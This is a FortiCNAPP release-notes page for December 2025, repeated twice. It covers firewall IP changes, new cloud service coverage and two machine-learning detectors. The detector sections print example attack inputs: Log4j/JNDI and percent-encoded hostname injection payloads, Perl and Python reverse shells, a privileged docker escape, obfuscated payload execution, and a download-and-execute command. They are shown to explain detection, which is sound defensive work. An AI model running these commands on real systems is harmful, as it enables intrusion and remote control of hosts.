Fortinet white logo
Fortinet docs logo DOCUMENT LIBRARY 26.1.0
Fortinet white logo
Fortinet docs logo DOCUMENT LIBRARY
Products Best Practices Hardware Guides Products A-Z
Summary
By Solution
By 4D Pillars
By Cloud
All Products
Secure Networking
Unified SASE
Security Operations
Secure SD-WAN
Secure Access Service Edge (SASE)
ZTNA
LAN Edge
Identity and Access Management
Next Generation Firewall
Web Application Firewall
Public Cloud
Private Cloud
FortiCloud
Secure Networking
  • Hybrid Mesh Firewall
  • NOC Management
  • LAN
  • WAN
    • More >>
    Unified SASE
  • Single Vendor SASE
  • Cloud Network Security
  • Secure Endpoint Connectivity
  • Web Application / API Protection
    • More >>
    Security Operations
  • Security Operations Automation
  • Identity
  • Early Detection & Prevention
    • More >>
    Secure Networking
  • Hybrid Mesh Firewall
  • NOC Management
  • LAN
  • WAN
  • Communication & Surveillance
    • Unified SASE
  • Single Vendor SASE
  • Secure Endpoint Connectivity
  • Cloud Network Security
  • Cloud-Native Security
  • Web Application / API Protection
    • Security Operations
  • Security Operations Automation
  • Endpoint
  • Data Protection
  • Identity
  • Email
  • Early Detection & Prevention
  • Expert Services
  • Edge Firewall
  • Orchestration & management
  • SD Branch
  • Application Delivery
  • Single Vendor SASE
  • Secure Endpoint Connectivity
  • Secure Private Access
  • Thin Edge
  • Identity
  • Application Gateway
  • Enterprise Asset Management
  • Endpoint Agent
  • Agentless Security Posture
  • Identity
  • Wireless
  • Switching
  • Identity
  • Privilege Acccess Management
  • Next Generation Firewall
  • Orchestration & management
  • Expert Services
  • Web Application / API Protection
  • All
  • All
  • Account Management
  • SAAS Management
  • SAAS Application Security
  • Managed Services
  • Platform as a service (PAAS)
  • Other SAAS Services
    • 4D Resources
    Solution Hubs
  • 4D Pillars
  • Cloud
  • Popular Solutions
    • All Products

    Release Notes

    Home FortiCNAPP Release Notes

    December 2025 Platform Releases

    December 2025 Platform Releases

    Generally Available

    • Connectivity update: Actions for existing customers

      Recent infrastructure changes have streamlined the IP addresses you must allow for inbound and outbound traffic.

      The following details the updates you should now make to your firewall configurations:

      • Outbound traffic

        Remove the following obsolete IP addresses from your firewall configurations:

        • IP addresses for api.lacework.net:

          • 34.209.102.252

          • 35.164.176.181

          • 44.225.189.230

          • 44.230.246.102

          • 52.35.54.98

          • 54.185.31.7

        • IP addresses for aprodus.agent.lacework.net:

          • 35.95.82.0/26

        • IP addresses for api.fra.lacework.net:

          • 162.159.134.54

          • 162.159.135.54

        • IP addresses for Cloudflare endpoints (remove from all outbound policies):

          • 162.159.137.89

          • 162.159.138.89

      • Inbound traffic

        Remove the following obsolete IP addresses from your firewall configurations:

        • US region:

          • 34.208.85.38

          • 35.166.181.157

          • 44.231.201.69

          • 52.88.113.199

          • 54.203.18.234

          • 54.213.7.200

        Where appropriate, add the following new IP addresses to your firewall configuration.

        • APAC region:

          • 54.79.135.186

          • 54.66.98.157

          • 13.54.191.160

        • Singapore region:

          • 18.140.103.40

          • 47.130.81.233

          • 54.179.201.12

    • New Azure service coverage added

      The following Azure services and related datasources are now available:

      Storage Sync:

      • microsoft.storagesync/storagesyncservices/registeredservers

      • microsoft.storagesync/storagesyncservices/privateendpointconnections

      Communication:

      • microsoft.communication/communicationservices

      Cost Management:

      • microsoft.costmanagement/budgets

      For more information, see Datasource Metadata. Note that the introduction of new services may require you to modify the privileges of the FortiCNAPP user in your cloud accounts. For more information, see Maintain Cloud Integrations with Terraform.

    • Pull request commenting

      When a pull request (PR) in a repository is submitted, Lacework FortiCNAPP runs scans on both the source and target branches. It compares the results to identify any issues or vulnerabilities which will be introduced into the target branch. If a potential violation is identified, Lacework FortiCNAPP will return comments to explain the violation and provide a warning. See Pull request commenting.

    • Automated configuration expanded service options

      The following integrations are now available through FortiCNAPP automated configuration:

      • Organization-level integrations for AWS and GCP

      • Tenant-level integrations for Azure

      • Azure Agentless Workload Security

      • AWS EKS Audit Log

      • GCP GKE Audit Log

      For more information see:

    • Improved cloud accounts page

      The Settings > Cloud accounts page has been redesigned to improve the page usability by grouping your individual integrations into accounts.

      The Cloud accounts page now reflects the natural hierarchy of your integrations. Click an account to view details about the integrations associated with that account.

    • Machine learning-powered detection of hostname command injection

      This new method uses machine learning to detect hostname command injection attempts in both DNS query hostnames and usernames from successful and failed login attempts. This model distinguishes malicious payloads from the background noise of benign and malformed hostnames, even when they appear very similar.

      The model delivers improved quality and speed, outperforming the previous detector and catching more injection payloads.

      Example detections:

      • Percent-encoded URL-style payloads:

        %24%7burl:UTF-8:https://35.160.149.56.x-forwarded-for.d2i3b97tmjpkau3cqusgzt59jaisow5f9.i-sh.detectors-testing.com%7d

      • Log4j / JNDI injection payloads:

        %24%7Bjndi%3Aldap%3A//127.0.0.1%23.%24%7BhostName%7D.xforwardedfor.d4a519p8n9i11poqj8hgomy51sqfseapq.oast.online%7D.olo-service-v2-prod.svc.cluster.local

      • Other hostname-based injections, including SSRF and SQL injection patterns.

      Benefits to you:

      • Resilient to obfuscation: Provides a robust defense against common tricks such as percent-encoding and formatting variations attackers use to evade simple rules.

      • Better than legacy rules and detectors: Surpasses the previous injection detector, surfacing attacks that would otherwise be missed.

      • Built for scale and efficiency: Handles massive hostname volumes without requiring GPUs, making advanced detection practical in high-throughput environments.

    • Machine learning-powered detection of anomalous and suspicious host commands

      This new detection uses machine-learing models to recognize commands that meet both of the following criteria:

      • They differ significantly from those previously executed in the environment.

      • They exhibit characteristics that are suggestive of malicious activity.

      This detection looks for suspicious patterns in both Linux and Windows command line strings, identifying various types of suspicious behavior that can easily be missed by regular-expression-based detections.

      Detections produced by this model will appear as Observations within Composite Alerts:

      • The short description is Anomalous host commands detected.

      • The observation type is host_anomalous_command.

      These detections augment composite alerts triggered by stronger signals or trigger composite alerts on their own. In the absence of stronger signals, these alerts will appear as Suspicious Activity on Host detections with Medium severity.

      These processes have been enriched with the command line strings of their parent processes. These command lines can be seen by clicking on the process node at the end of the ran anomalous process edge in the Intrusion Graph.

      Example malicious commands detected by this model:

      • Elaborate reverse shell (Perl example):

        sudo perl -e use Socket;$i="<REDACTED_IP>";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

      • Elaborate reverse shell (Python example):

        python -c a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("<REDACTED_IP>",4444));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")

      • Container escape and host takeover:

        ./docker run -it -v /:/host --privileged osexp2000/ubuntu-with-utils

      • C2 attack script with keep-alive:

        /bin/sh -c /tmp/attack '{"port": "4444", "ip": "<REDACTED_IP>", "procedure": "bash196"}' && tail -f /dev/null

      • Malicious payload obfuscation (pack example)

        /usr/bin/git archive --format=zip --prefix=<REDACTED> --exec=`perl -e 'system(pack(qq,H152,,qq,<REDACTED_PAYLOAD>,))'` --remote=<REDACTED>/ --

      • Malicious payload obfuscation (base64 and ZIP example with privilege escalation):

      • sudo -u root -H -- /usr/bin/python -c import codecs,os,sys;_=codecs.decode;exec(_(_("<REDACTED_PAYLOAD>".encode(),"base64"),"zip"))

      • Suspicious download and execute from /tmp:

        /bin/sh -c wget http://<REDACTED_PUBLIC_IP>:8000/tmp && chmod 777 tmp && ./tmp

      Benefits to you:

      • Enables detection of a broader range of malicious commands than would be possible using pattern-based techniques.

      • The trained mode generalizes across variations in command construction that are difficult to capture with manually written rules. While hand-crafted detections are typically optimized for high precision (low false positive rate), augmenting them with models like this improves recall (reduces the false negative rate) while avoiding alert fatigue.

    • Cloud identity security support for Azure

      Identity security supports Azure, providing unified visibility and deeper insights into your cloud identity security. To take full advantage of this feature, please ensure you have an Azure configuration integration enabled.

      With identity security, you can gain insights into your Azure identity posture through the following features:

      • Cloud provider filter option for Azure on all identity pages

      • New Azure-based Overview charts and Identity Explorer Overview page

      • Top Identity Risks page for Azure identities

      • Identity entitlement-based risks for Entra users, groups, and service principals

      • Support for net effective permissions:

        • Direct role assignment based permissions

        • 1-hop permissions via group membership

        • Deny Assignments

        • Permission inheritance (child resources inherit parent resource permissions)

      • Support for remediations, including excessive privileges analysis

      Please note that Azure activity log integration and Azure agentless workload scanning are recommended to take full advantage of these features.

      For more information, see Integrate Azure Identity in the FortiCNAPP Administration Guide.

    • New Azure service coverage added

      The following Azure service and related datasources are now available:

      For more information, see Datasource Metadata. Note that the introduction of new services may require you to modify the privileges of the FortiCNAPP user in your cloud accounts. For more information, see Maintain Cloud Integrations with Terraform.

    • New AWS service coverage added

      The following AWS services and related datasources are now available:

      For more information, see Datasource Metadata. Note that the introduction of new services may require you to modify the privileges of the FortiCNAPP user in your cloud accounts. For more information, see Maintain Cloud Integrations with Terraform.

    Public Preview

    • Vulnerable components view

      The Vulnerable Components view in Code security > Applications > Components has been updated and shows all vulnerabilities found in a repository, grouped by the direct dependencies that introduce them. See Components.

    Previous
    Next

    December 2025 Platform Releases

    December 2025 Platform Releases

    Generally Available

    • Connectivity update: Actions for existing customers

      Recent infrastructure changes have streamlined the IP addresses you must allow for inbound and outbound traffic.

      The following details the updates you should now make to your firewall configurations:

      • Outbound traffic

        Remove the following obsolete IP addresses from your firewall configurations:

        • IP addresses for api.lacework.net:

          • 34.209.102.252

          • 35.164.176.181

          • 44.225.189.230

          • 44.230.246.102

          • 52.35.54.98

          • 54.185.31.7

        • IP addresses for aprodus.agent.lacework.net:

          • 35.95.82.0/26

        • IP addresses for api.fra.lacework.net:

          • 162.159.134.54

          • 162.159.135.54

        • IP addresses for Cloudflare endpoints (remove from all outbound policies):

          • 162.159.137.89

          • 162.159.138.89

      • Inbound traffic

        Remove the following obsolete IP addresses from your firewall configurations:

        • US region:

          • 34.208.85.38

          • 35.166.181.157

          • 44.231.201.69

          • 52.88.113.199

          • 54.203.18.234

          • 54.213.7.200

        Where appropriate, add the following new IP addresses to your firewall configuration.

        • APAC region:

          • 54.79.135.186

          • 54.66.98.157

          • 13.54.191.160

        • Singapore region:

          • 18.140.103.40

          • 47.130.81.233

          • 54.179.201.12

    • New Azure service coverage added

      The following Azure services and related datasources are now available:

      Storage Sync:

      • microsoft.storagesync/storagesyncservices/registeredservers

      • microsoft.storagesync/storagesyncservices/privateendpointconnections

      Communication:

      • microsoft.communication/communicationservices

      Cost Management:

      • microsoft.costmanagement/budgets

      For more information, see Datasource Metadata. Note that the introduction of new services may require you to modify the privileges of the FortiCNAPP user in your cloud accounts. For more information, see Maintain Cloud Integrations with Terraform.

    • Pull request commenting

      When a pull request (PR) in a repository is submitted, Lacework FortiCNAPP runs scans on both the source and target branches. It compares the results to identify any issues or vulnerabilities which will be introduced into the target branch. If a potential violation is identified, Lacework FortiCNAPP will return comments to explain the violation and provide a warning. See Pull request commenting.

    • Automated configuration expanded service options

      The following integrations are now available through FortiCNAPP automated configuration:

      • Organization-level integrations for AWS and GCP

      • Tenant-level integrations for Azure

      • Azure Agentless Workload Security

      • AWS EKS Audit Log

      • GCP GKE Audit Log

      For more information see:

    • Improved cloud accounts page

      The Settings > Cloud accounts page has been redesigned to improve the page usability by grouping your individual integrations into accounts.

      The Cloud accounts page now reflects the natural hierarchy of your integrations. Click an account to view details about the integrations associated with that account.

    • Machine learning-powered detection of hostname command injection

      This new method uses machine learning to detect hostname command injection attempts in both DNS query hostnames and usernames from successful and failed login attempts. This model distinguishes malicious payloads from the background noise of benign and malformed hostnames, even when they appear very similar.

      The model delivers improved quality and speed, outperforming the previous detector and catching more injection payloads.

      Example detections:

      • Percent-encoded URL-style payloads:

        %24%7burl:UTF-8:https://35.160.149.56.x-forwarded-for.d2i3b97tmjpkau3cqusgzt59jaisow5f9.i-sh.detectors-testing.com%7d

      • Log4j / JNDI injection payloads:

        %24%7Bjndi%3Aldap%3A//127.0.0.1%23.%24%7BhostName%7D.xforwardedfor.d4a519p8n9i11poqj8hgomy51sqfseapq.oast.online%7D.olo-service-v2-prod.svc.cluster.local

      • Other hostname-based injections, including SSRF and SQL injection patterns.

      Benefits to you:

      • Resilient to obfuscation: Provides a robust defense against common tricks such as percent-encoding and formatting variations attackers use to evade simple rules.

      • Better than legacy rules and detectors: Surpasses the previous injection detector, surfacing attacks that would otherwise be missed.

      • Built for scale and efficiency: Handles massive hostname volumes without requiring GPUs, making advanced detection practical in high-throughput environments.

    • Machine learning-powered detection of anomalous and suspicious host commands

      This new detection uses machine-learing models to recognize commands that meet both of the following criteria:

      • They differ significantly from those previously executed in the environment.

      • They exhibit characteristics that are suggestive of malicious activity.

      This detection looks for suspicious patterns in both Linux and Windows command line strings, identifying various types of suspicious behavior that can easily be missed by regular-expression-based detections.

      Detections produced by this model will appear as Observations within Composite Alerts:

      • The short description is Anomalous host commands detected.

      • The observation type is host_anomalous_command.

      These detections augment composite alerts triggered by stronger signals or trigger composite alerts on their own. In the absence of stronger signals, these alerts will appear as Suspicious Activity on Host detections with Medium severity.

      These processes have been enriched with the command line strings of their parent processes. These command lines can be seen by clicking on the process node at the end of the ran anomalous process edge in the Intrusion Graph.

      Example malicious commands detected by this model:

      • Elaborate reverse shell (Perl example):

        sudo perl -e use Socket;$i="<REDACTED_IP>";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

      • Elaborate reverse shell (Python example):

        python -c a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("<REDACTED_IP>",4444));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")

      • Container escape and host takeover:

        ./docker run -it -v /:/host --privileged osexp2000/ubuntu-with-utils

      • C2 attack script with keep-alive:

        /bin/sh -c /tmp/attack '{"port": "4444", "ip": "<REDACTED_IP>", "procedure": "bash196"}' && tail -f /dev/null

      • Malicious payload obfuscation (pack example)

        /usr/bin/git archive --format=zip --prefix=<REDACTED> --exec=`perl -e 'system(pack(qq,H152,,qq,<REDACTED_PAYLOAD>,))'` --remote=<REDACTED>/ --

      • Malicious payload obfuscation (base64 and ZIP example with privilege escalation):

      • sudo -u root -H -- /usr/bin/python -c import codecs,os,sys;_=codecs.decode;exec(_(_("<REDACTED_PAYLOAD>".encode(),"base64"),"zip"))

      • Suspicious download and execute from /tmp:

        /bin/sh -c wget http://<REDACTED_PUBLIC_IP>:8000/tmp && chmod 777 tmp && ./tmp

      Benefits to you:

      • Enables detection of a broader range of malicious commands than would be possible using pattern-based techniques.

      • The trained mode generalizes across variations in command construction that are difficult to capture with manually written rules. While hand-crafted detections are typically optimized for high precision (low false positive rate), augmenting them with models like this improves recall (reduces the false negative rate) while avoiding alert fatigue.

    • Cloud identity security support for Azure

      Identity security supports Azure, providing unified visibility and deeper insights into your cloud identity security. To take full advantage of this feature, please ensure you have an Azure configuration integration enabled.

      With identity security, you can gain insights into your Azure identity posture through the following features:

      • Cloud provider filter option for Azure on all identity pages

      • New Azure-based Overview charts and Identity Explorer Overview page

      • Top Identity Risks page for Azure identities

      • Identity entitlement-based risks for Entra users, groups, and service principals

      • Support for net effective permissions:

        • Direct role assignment based permissions

        • 1-hop permissions via group membership

        • Deny Assignments

        • Permission inheritance (child resources inherit parent resource permissions)

      • Support for remediations, including excessive privileges analysis

      Please note that Azure activity log integration and Azure agentless workload scanning are recommended to take full advantage of these features.

      For more information, see Integrate Azure Identity in the FortiCNAPP Administration Guide.

    • New Azure service coverage added

      The following Azure service and related datasources are now available:

      For more information, see Datasource Metadata. Note that the introduction of new services may require you to modify the privileges of the FortiCNAPP user in your cloud accounts. For more information, see Maintain Cloud Integrations with Terraform.

    • New AWS service coverage added

      The following AWS services and related datasources are now available:

      For more information, see Datasource Metadata. Note that the introduction of new services may require you to modify the privileges of the FortiCNAPP user in your cloud accounts. For more information, see Maintain Cloud Integrations with Terraform.

    Public Preview

    • Vulnerable components view

      The Vulnerable Components view in Code security > Applications > Components has been updated and shows all vulnerabilities found in a repository, grouped by the direct dependencies that introduce them. See Components.

    Previous
    Next